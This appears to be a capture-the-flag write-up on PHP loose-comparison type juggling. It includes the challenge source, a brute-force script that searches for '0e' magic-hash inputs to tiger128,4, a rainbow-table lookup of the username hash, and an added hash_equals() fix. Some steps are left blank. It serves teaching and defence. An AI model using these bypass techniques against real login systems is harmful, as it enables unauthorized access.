The source code was provided:
<?php
if (isset($_GET['username']) and isset($_GET['password'])) {
    // Username check: digest of the input against a fixed tiger128,4 digest.
    if (hash("tiger128,4", $_GET['username']) != "51c3f5f5d8a8830bc5d8b7ebcb5717df") {
        echo "Invalid username";
    }
    // Password check: loose comparison (==) against a digest of the form 0e<digits>.
    else if (hash("tiger128,4", $_GET['password']) == "0e132798983807237937411964085731") {
        $flag = fopen("flag.txt", "r") or die("Cannot open file");
        echo fread($flag, filesize("flag.txt"));
        fclose($flag);
    }
    else {
        echo "Try harder";
    }
}
else {
    echo "Invalid parameters";
}
?>
I can tell this is testing us on PHP loose comparison (see "PHP String comparison vulnerabilities").
Essentially, in this case, the hash of the password is being compared to 0e132798983807237937411964085731 with ==. In the BEST PROGRAMMING LANGUAGE PHP, a string of that form is simply treated as a float, which means 0e132798983807237937411964085731 == 0e111 will yield True. So let's try to generate such a hash using tiger128,4, a hash function built into PHP.
I was trying to see if I could use a Python script for it, since I am not very familiar with PHP scripting lol. PS: I can read it just fine.....
But I quickly came up with a slow but working PHP script.
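<?php
// It might take longer than 5 minutes.
$x = 1;
while (true) {
    $test = hash('tiger128,4', strval($x));
    // Candidate: digest starts with "0e" and the rest looks numeric.
    // is_numeric() also accepts a second exponent (e.g. "12e34"),
    // so each printed value still has to be checked by hand.
    if (substr($test, 0, 2) === "0e" and is_numeric(substr($test, 2))) {
        echo $x;
        echo "\n";
    }
    $x++;
}
?>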
Afterward, we need to manually test each x with echo hash('tiger128,4',strval($x)); and make sure the final hash is in the format 0e[1-9]+.
Ex.
Will not work. Eventually, we got something that fits our needs.
We already solved the hardest part. So let's also 'crack' the username hash, 51c3f5f5d8a8830bc5d8b7ebcb5717df.
Hash tiger128,4: 51c3f5f5d8a8830bc5d8b7ebcb5717df
A quick rainbow table lookup will do the trick!
So we got our creds.
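The fix for the password check in the challenge source, as an added example that is not part of the original write-up or the challenge's code: it runs the loose == comparison and hash_equals() side by side. STORED is the digest from the page; the function names and the sample digests are constructed for illustration and are not real tiger128,4 outputs.

```php
<?php
// Added example, not the challenge's code.
const STORED = "0e132798983807237937411964085731"; // digest from the page

// Vulnerable form used by the challenge: when both operands are numeric
// strings, == converts them to floats before comparing.
function check_loose(string $digest): bool
{
    return $digest == STORED;
}

// Hardened form: hash_equals() compares the two strings byte for byte,
// with no numeric conversion, and in constant time.
function check_strict(string $digest): bool
{
    return hash_equals(STORED, $digest);
}

// Constructed sample digests (hypothetical values for the demonstration).
$samples = [
    'exact match'        => "0e132798983807237937411964085731",
    '0e + other digits'  => "0e000000000000000000000000000001",
    '0e + a hex letter'  => "0e1327989838072379374119640857a1",
    '0e + second "e"'    => "0e12e345678901234567890123456789",
];

// Print both results for every sample so the difference is visible per row.
foreach ($samples as $label => $digest) {
    printf(
        "%-20s loose=%-5s strict=%s\n",
        $label,
        var_export(check_loose($digest), true),
        var_export(check_strict($digest), true)
    );
}
?>
```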